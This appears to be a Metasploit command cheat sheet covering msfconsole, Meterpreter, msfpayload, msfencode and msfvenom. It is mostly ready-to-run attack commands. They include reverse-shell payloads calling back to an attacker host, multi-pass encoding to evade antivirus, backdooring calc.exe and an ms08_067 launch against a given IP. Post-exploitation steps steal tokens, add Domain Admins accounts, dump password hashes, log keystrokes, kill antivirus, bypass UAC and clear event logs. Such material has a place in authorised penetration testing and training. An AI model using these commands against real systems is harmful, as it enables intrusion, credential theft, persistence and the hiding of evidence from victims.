service apache2 start
service postgresql start
msfconsole
1. MSF terminal (msfconsole) commands
show exploits
Lists all exploit modules in the Metasploit framework.
show payloads
Lists all payloads in the Metasploit framework.
show auxiliary
Lists all auxiliary modules in the Metasploit framework.
search name
Searches for exploits and other modules in the Metasploit framework by name.
info
Displays information about a specific exploit or module.
use name
Loads an exploit or module.
LHOST
The IP address of your local host, i.e. the address the target connects back to.
RHOST
The remote host, i.e. the target.
set function
Sets a specific configuration parameter.
setg function
Sets a specific configuration parameter globally.
show options
Lists all configurable parameters of an exploit or module.
show targets
Lists the target platforms supported by the exploit.
set target num
Specifies the operating system and patch level of the target, if you know it.
set payload payload
Specifies the payload to use.
show advanced
Lists all advanced configuration options.
set autorunscript migrate -f
Automatically migrates to a separate process once the exploit completes.
check
Checks whether the target is vulnerable to the selected exploit.
exploit
Runs the exploit or module against the target.
exploit -j
Runs the exploit as a background job.
exploit -z
Does not interact with the session after the exploit succeeds.
exploit -e encoder
Specifies the payload encoder to use.
exploit -h
Lists the help information for the exploit command.
sessions -l
Lists the available interactive sessions (used when handling multiple shells).
sessions -l -v
Lists all available interactive sessions with their details, such as which vulnerability was used to compromise the system.
sessions -s script
Runs a specific Meterpreter script in all active Meterpreter sessions.
sessions -K
Kills all active interactive sessions.
sessions -c cmd
Executes a command on all active Meterpreter sessions.
sessions -u sessionID
Upgrades a normal Win32 shell to a Meterpreter shell.
db_create name
Creates a database to be used by database-driven attacks.
db_nmap
Runs Nmap and stores all scan results in the database.
db_autopwn -h
Displays the help information for the db_autopwn command.
db_autopwn -p -r -e
Runs db_autopwn against all discovered open ports, exploits all systems, and uses a reverse shell.
db_destroy
Deletes the current database.
db_destroy user:password@host:port/database
Deletes the database using advanced options.
2. Meterpreter commands
help
Opens the help menu.
run scriptname
Runs a Meterpreter script; all script names can be viewed in the scripts/meterpreter directory.
sysinfo
Lists system information for the compromised host.
ls
Lists the files and folders on the target host.
use priv
Loads the privilege escalation extension module to extend the Meterpreter library.
ps
Displays all running processes and the user accounts associated with them.
migrate PID
Migrates to the specified process ID.
use incognito
Loads the incognito functions (used to steal tokens on the target host or impersonate users).
list_tokens -u
Lists the tokens available for users on the target host.
impersonate_token DOMAIN_NAME\\USERNAME
Impersonates a token available on the target host.
steal_token PID
Steals the available token of a given process and impersonates it.
drop_token
Stops impersonating the current token.
getsystem
Uses various attack vectors to elevate privileges to SYSTEM.
shell
Runs an interactive shell with all available tokens.
execute -f cmd.exe -i
Executes cmd.exe and interacts with it.
execute -f cmd.exe -i -t
Executes cmd.exe with all available tokens.
execute -f cmd.exe -i -H -t
Executes cmd.exe with all available tokens and hides the process.
rev2self
Reverts to the original user account that was used to compromise the target host.
reg command
Interacts with the target host's registry: create, delete, and query operations.
setdesktop number
Switches to another desktop (based on the users that are logged on).
screenshot
Takes a screenshot of the target host's screen.
upload file
Uploads a file to the target host.
download file
Downloads a file from the target host.
keyscan_dump
Dumps the keystrokes captured by the keylogger on the target host.
getprivs
Obtains as many privileges as possible on the target host.
uictl enable keyboard/mouse
Takes control of the target host's keyboard and mouse.
background
Sends the current Meterpreter shell to the background.
hashdump
Dumps the password hashes on the target host.
use sniffer
Loads the sniffer module.
sniffer_interfaces
Lists all open network interfaces on the target host.
sniffer_dump interfaceID pcapname
Starts sniffing on the target host.
sniffer_start interfaceID packet-buffer
Starts the sniffer on the target host with a specific packet buffer size.
sniffer_stats interfaceID
Gets statistics for the interface being sniffed.
sniffer_stop interfaceID
Stops the sniffer.
add_user username password -h ip
Adds a user on the remote target host.
add_group_user "Domain Admins" username -h ip
Adds the user to the Domain Admins group on the target host.
clearev
Clears the event logs on the target host.
timestomp
Modifies file attributes, such as a file's creation time (anti-forensics).
reboot
Reboots the target host.
3. msfpayload commands
msfpayload -h
Shows the help information for msfpayload.
msfpayload -l
Lists all available payloads.
msfpayload windows/meterpreter/bind_tcp O
Lists all configuration options for the windows/meterpreter/bind_tcp payload (every payload is configurable).
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > payload.exe
Creates a Meterpreter reverse_tcp payload that connects back to port 443 on 192.168.1.5 and saves it as a Windows executable named payload.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > payload.raw
Generates the same payload as above in raw format; this file is used by msfencode below.
msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Generates the same payload as above, but exports it as shellcode in C format.
msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Exports the payload as a %u-encoded JavaScript string.
4. msfencode commands
msfencode -h
Lists the help information for msfencode.
msfencode -l
Lists all available encoders.
msfencode -t (c, elf, exe, java, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)
Specifies the format in which the encoded buffer is displayed.
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
Encodes payload.raw five times with the shikata_ga_nai encoder and writes the result to a file named encoded_payload.exe.
msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
Creates a payload that is nested-encoded with multiple encoders.
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
Creates pure alphanumeric shellcode, with the ESI register pointing to the shellcode, and outputs it in C format.
5. msfcli commands
msfcli | grep exploit
Lists only the exploit modules.
msfcli | grep exploit/windows
Lists only the exploit modules related to Windows.
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E
Launches the ms08_067_netapi exploit against 172.16.32.142 with a bind_tcp payload that binds to and listens on port 443.
6. Metasploit advanced techniques
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -x calc.exe -k -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe
Creates a reverse Meterpreter payload that connects back to port 443 on 192.168.1.5, uses calc.exe as the template executable, keeps (-k) the template's own execution flow running inside the backdoored application, and finally produces the shikata_ga_nai-encoded executable payload.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -x calc.exe -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe
Creates a reverse Meterpreter payload that connects back to port 443 on 192.168.1.5 and uses calc.exe as the template executable, but does not keep the template's execution flow running, so nothing is displayed on the target host when the payload runs. This configuration is useful when you have compromised a remote host through a browser vulnerability and do not want a program window to appear in front of the target user; as before, the result is the shikata_ga_nai-encoded executable payload.exe.
msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe && msfcli multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E
Creates a raw-format bind_tcp Meterpreter payload, encodes it seven times with shikata_ga_nai, writes it to a Windows executable named payload.exe, and starts a multi/handler listener for it.
7. msfvenom
Use msfvenom, an all-in-one tool, to create and encode your payload.
msfvenom --payload windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai LHOST=172.16.1.32 LPORT=443 > msf.exe
[*] X86/shikata_ga_nai succeeded with size 317 (iteration=1)
root://opt/framework3/msf3#
This single command creates the payload and writes it directly in executable format.
8. Meterpreter post-exploitation commands
Use Meterpreter on a Windows host for privilege escalation:
meterpreter > use priv
meterpreter > getsystem
Steal a Domain Admins group token from a given process ID, add a domain account, and add that account to the Domain Admins group:
meterpreter > ps
meterpreter > steal_token 1784
meterpreter > shell
C:\Windows\system32> net user metasploit <password> /add /domain
C:\Windows\system32> net group "Domain Admins" metasploit /add /domain
Dump the password hashes from the SAM database:
meterpreter > use priv
meterpreter > getsystem
meterpreter > hashdump
Tip: on Windows 2008, if the getsystem and hashdump commands throw an exception, you need to migrate into a process that runs with SYSTEM privileges first.
Automatically migrate to a separate process:
meterpreter > run migrate
Kill the antivirus process running on the target host with Meterpreter's killav script:
meterpreter > run killav
Capture keystrokes on the target host for a specific process:
meterpreter > ps
meterpreter > migrate 1436
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
Impersonate an administrator using incognito:
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > use priv
meterpreter > getsystem
meterpreter > list_tokens -u
meterpreter > impersonate_token IHAZSECURITY\\Administrator
Check which countermeasures the target host has in place, list the help menu, and turn off the firewall and other protections that were found:
meterpreter > run getcountermeasure
meterpreter > run getcountermeasure -h
meterpreter > run getcountermeasure -d -k
Identify whether the compromised host is a virtual machine:
meterpreter > run checkvm
Use a cmd shell from within the Meterpreter session:
meterpreter > shell
Get a graphical interface (VNC) to the target host:
meterpreter > run vnc
Send the running Meterpreter session to the background:
meterpreter > background
Bypass the Windows User Account Control (UAC) mechanism:
meterpreter > run post/windows/escalate/bypassuac
Dump the password hashes of a Mac OS X system:
meterpreter > run post/osx/gather/hashdump
Dump the password hashes of a Linux system:
meterpreter > run post/linux/gather/hashdump
Metasploit Common Commands